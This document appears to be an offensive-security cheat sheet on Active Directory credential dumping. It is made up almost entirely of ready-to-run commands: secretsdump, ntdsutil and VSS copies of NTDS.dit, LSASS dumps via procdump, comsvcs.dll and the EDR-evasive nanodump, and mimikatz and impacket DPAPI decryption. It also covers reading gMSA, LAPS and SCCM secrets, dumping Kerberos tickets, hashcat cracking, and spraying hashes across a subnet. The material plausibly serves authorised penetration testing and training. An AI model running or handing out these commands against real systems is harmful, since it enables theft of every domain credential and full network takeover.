Credential Dumping

Sections Credential Dumping

Pull credentials from anywhere in AD: from the DC’s NTDS.dit, from local SAM, from LSASS, from gMSA blobs, from LAPS attributes. DCSync gets its own file because it’s the single most important credential dump path, see DCSync .

DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'

i. Remote SAM + LSA dump (local admin needed)

When you’re local admin on any host (not DC), secretsdump pulls the local SAM, LSA secrets, cached domain creds:

impacket-secretsdump $DOMAIN/$USER:$PASS@host.$DOMAIN
impacket-secretsdump -hashes :$NTHASH $DOMAIN/$USER@host.$DOMAIN
impacket-secretsdump -k -no-pass $DOMAIN/$USER@host.$DOMAIN
## Output sections:
## [*] SAM:           local Administrator + local user NTLM hashes
## [*] CACHED:        mscash2 hashes for last 10 logged-in domain users
## [*] LSA SECRETS:   service account passwords (often cleartext)
## [*] DPAPI_SYSTEM:  master key for SYSTEM DPAPI

The LSA SECRETS section is gold - service accounts running on the host often have cleartext passwords there. Spray these everywhere.

Cached domain creds (mscash2) crack at hashcat -m 2100:

hashcat -m 2100 mscash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

ii. NTDS.dit dump (Domain Admin or DRSUAPI rights)

The whole AD database. Every user’s NT hash. DCSync is the API-based method, see DCSync . Two alternative methods if DCSync is blocked:

Method A: VSS snapshot on the DC

You need SYSTEM on the DC for this:

ntdsutil "ac i ntds" "ifm" "create full c:\windows\temp\ntds" q q
## Files created:
## C:\Windows\Temp\ntds\Active Directory\ntds.dit
## C:\Windows\Temp\ntds\registry\SYSTEM
## C:\Windows\Temp\ntds\registry\SECURITY

Or with raw VSS:

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
vssadmin delete shadows /shadow={ID}

Then offline parse:

impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL

Method B: WMIExec ntdsutil

When you have DA but want to run it remotely:

impacket-secretsdump -use-vss $DOMAIN/Administrator:$PASS@$DC

-use-vss triggers Volume Shadow Copy and ntdsutil remotely instead of using DRSUAPI. Useful when DCSync is restricted but you have SYSTEM-level access.

iii. LSASS dump (from compromised user/computer)

Different from DCSync - LSASS gives you the credentials of CURRENTLY LOGGED IN users on that host. Often includes recent admin sessions with cleartext (older Windows) or NTLM (modern).

procdump (signed Microsoft binary, usually allowed):

procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp

comsvcs.dll trick (no external binary):

$id = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $id C:\Windows\Temp\lsass.dmp full

nanodump (EDR-evasive):

nanodump.exe --write C:\Windows\Temp\lsass.dmp

Parse on attacker:

impacket-pypykatz lsa minidump lsass.dmp
## or mimikatz on Windows:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

LSA Protection (PPL)

Server 2019+ and Win10 with PPL block standard LSASS dump. Bypass tools: PPLdump, PPLBlade, mimikatz !+ driver. See PrivEsc - Credentials & Files .

iv. DPAPI: decrypt user secrets at rest

Every Windows user has DPAPI master keys protecting their saved creds (browser, RDP, mail). Three ways to decrypt:

A) With user’s password (local user)

mimikatz # dpapi::masterkey /in:"C:\Users\u\AppData\Roaming\Microsoft\Protect\SID\MK" /password:"userpass"

B) With user’s NT hash (domain user)

mimikatz # dpapi::masterkey /in:"...\MK" /sid:S-1-5-21-... /hash:$NTHASH

C) Domain backup key (Domain Admin, decrypts EVERY user’s DPAPI)

Get the backup key:

impacket-secretsdump -just-dc-user 'krbtgt' -dc-ip $DC $DOMAIN/Administrator:$PASS@$DC
## or specifically:
mimikatz # lsadump::backupkeys /system:$DC /export
## or
impacket-dpapi backupkeys -t $DOMAIN/Administrator:$PASS@$DC

Then decrypt any user’s DPAPI:

impacket-dpapi masterkey -file "MK_FILE" -pvk domain_backupkey.pvk
impacket-dpapi credential -file CRED_FILE -key MASTERKEY

SharpDPAPI (Windows side):

SharpDPAPI.exe backupkey
SharpDPAPI.exe triage /pvk:BASE64
SharpDPAPI.exe credentials /pvk:BASE64

v. gMSA passwords

Group Managed Service Accounts have rotating passwords stored in msDS-ManagedPassword. If you’re allowed to read it (PrincipalsAllowedToRetrieveManagedPassword), you get the current and previous password as a blob.

nxc reads and decodes:

nxc ldap $DC -u $USER -p $PASS --gmsa
## Output: NTLM hash of the gMSA account, ready for PtH

Manual via bloodyAD + gMSA decoder:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object 'gmsa$' --attr msDS-ManagedPassword
## Then decode the blob with gMSADumper.py or similar

Use the hash:

nxc smb $DC -u 'gmsa$' -H $NTHASH
impacket-getTGT $DOMAIN/'gmsa$' -hashes :$NTHASH -dc-ip $DC

vi. LAPS passwords

Local administrator password for a managed computer, accessible to whoever’s allowed.

Legacy LAPS (ms-Mcs-AdmPwd)

Stored as cleartext in the attribute:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object 'COMPUTER$' --attr ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
## nxc module:
nxc ldap $DC -u $USER -p $PASS --laps
## All readable LAPS:
nxc ldap $DC -u $USER -p $PASS -M laps

Windows LAPS v2 (msLAPS-Password)

Newer format, may be encrypted with a domain key. nxc handles decryption when possible:

nxc ldap $DC -u $USER -p $PASS --laps

Plaintext attribute (when encryption not enabled):

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object 'COMPUTER$' --attr msLAPS-Password

Encrypted attribute requires the domain DPAPI key OR a Windows host where you can call the LAPS API:

Get-LapsADPassword -Identity computer$ -AsPlainText

vii. Cached domain credentials (mscash2)

The last N domain users to log in to a workstation have their creds cached locally (default N=10, hashed as mscash2). Pulled by secretsdump on local hosts (see section i).

Domain login cache:
contoso.local\jdoe:$DCC2$10240#jdoe#abc123...

Crack:

hashcat -m 2100 cache.txt rockyou.txt -r OneRuleToRuleThemAll.rule

mscash2 doesn’t enable Pass-the-Hash, you need to crack it for the actual password.

viii. DPAPI from offline files

When you have access to a user’s profile dir but no Windows host:

## Find master keys
find /mnt/profile -name 'MK' 2>/dev/null
## Decrypt with impacket-dpapi using NT hash or domain backup key
impacket-dpapi masterkey -file MK_FILE -sid S-1-5-21-... -password $USERPASS
impacket-dpapi masterkey -file MK_FILE -pvk domain_backupkey.pvk

Browser creds (Chromium-based) are AES-encrypted with a key wrapped by DPAPI. Pull the key from Local State, decrypt with the master key, decrypt the Login Data SQLite blobs.

ix. Kerberos ticket cache

Tickets in /tmp/krb5cc_* (Linux) or LSA memory (Windows). Already-active tickets you can PtT with.

Linux side:

ls -la /tmp/krb5cc_*
klist                                          ## current cache
klist -c /tmp/krb5cc_1001                      ## specific file
export KRB5CCNAME=/tmp/krb5cc_1001

Windows side:

Rubeus.exe triage                              ## list tickets per session
Rubeus.exe dump                                ## dump all ticket blobs
Rubeus.exe dump /service:krbtgt /luid:0x3e7   ## specific service ticket
klist

Tickets from another user’s session (requires SeImpersonate or admin):

Rubeus.exe dump /luid:0x12345

x. DSRM password / Directory Services Restore Mode

The local admin password set during DC promotion. If left unchanged or syncs to a domain account, leads to DA. Read with mimikatz on a DC:

mimikatz # lsadump::sam
mimikatz # lsadump::secrets

DSRMpassword survives even when domain is reset.

xi. Registry-based secret dumping

When you can read SECURITY hive, you can pull LSA secrets and cached creds offline:

reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SAM C:\Windows\Temp\SAM

Then:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Useful when you have SeBackupPrivilege but not full admin, see PrivEsc - Tokens & Privileges .

xii. SCCM secrets

SCCM (Configuration Manager) stores Network Access Account credentials. If you compromise an SCCM-managed host, the NAA cred is on disk:

## CIM/WMI query:
Get-WmiObject -Namespace 'ROOT\ccm\policy\machine\actualconfig' -Class CCM_NetworkAccessAccount
## Decryption via SharpSCCM or sccmhunter

nxc has an SCCM module:

nxc smb host.$DOMAIN -u $USER -p $PASS -M sccm

xiii. Hash type reference

Hash	hashcat -m	Where it comes from
NTLM	1000	SAM, LSASS, NTDS.dit
NetNTLMv2	5600	Responder capture
mscash2 (DCC2)	2100	Cached domain creds
Kerberos TGS RC4	13100	Kerberoasting
Kerberos TGS AES128	19600	Kerberoasting (AES128)
Kerberos TGS AES256	19700	Kerberoasting (AES256)
Kerberos AS-REP RC4	18200	ASREP-Roast
sha512crypt	1800	Linux $6$
KeePass	13400	.kdbx

xiv. After dumping

Run BloodHound, mark every account whose hash you now have as owned. New paths open up. Spray each cred (it’s not paranoid - admin reuse is the default):

nxc smb 10.10.11.0/24 -u admin_user -H $NTHASH --local-auth --continue-on-success
nxc smb 10.10.11.0/24 -u admin_user -p $CLEARTEXT --local-auth --continue-on-success

Then push to DCSync if you haven’t already, see DCSync .

i. Remote SAM + LSA dump (local admin needed) #

ii. NTDS.dit dump (Domain Admin or DRSUAPI rights) #

Method A: VSS snapshot on the DC #

Method B: WMIExec ntdsutil #

iii. LSASS dump (from compromised user/computer) #

iv. DPAPI: decrypt user secrets at rest #

A) With user’s password (local user) #

B) With user’s NT hash (domain user) #

C) Domain backup key (Domain Admin, decrypts EVERY user’s DPAPI) #

v. gMSA passwords #

vi. LAPS passwords #

Legacy LAPS (ms-Mcs-AdmPwd) #

Windows LAPS v2 (msLAPS-Password) #

vii. Cached domain credentials (mscash2) #

viii. DPAPI from offline files #

ix. Kerberos ticket cache #

x. DSRM password / Directory Services Restore Mode #

xi. Registry-based secret dumping #

xii. SCCM secrets #

xiii. Hash type reference #

xiv. After dumping #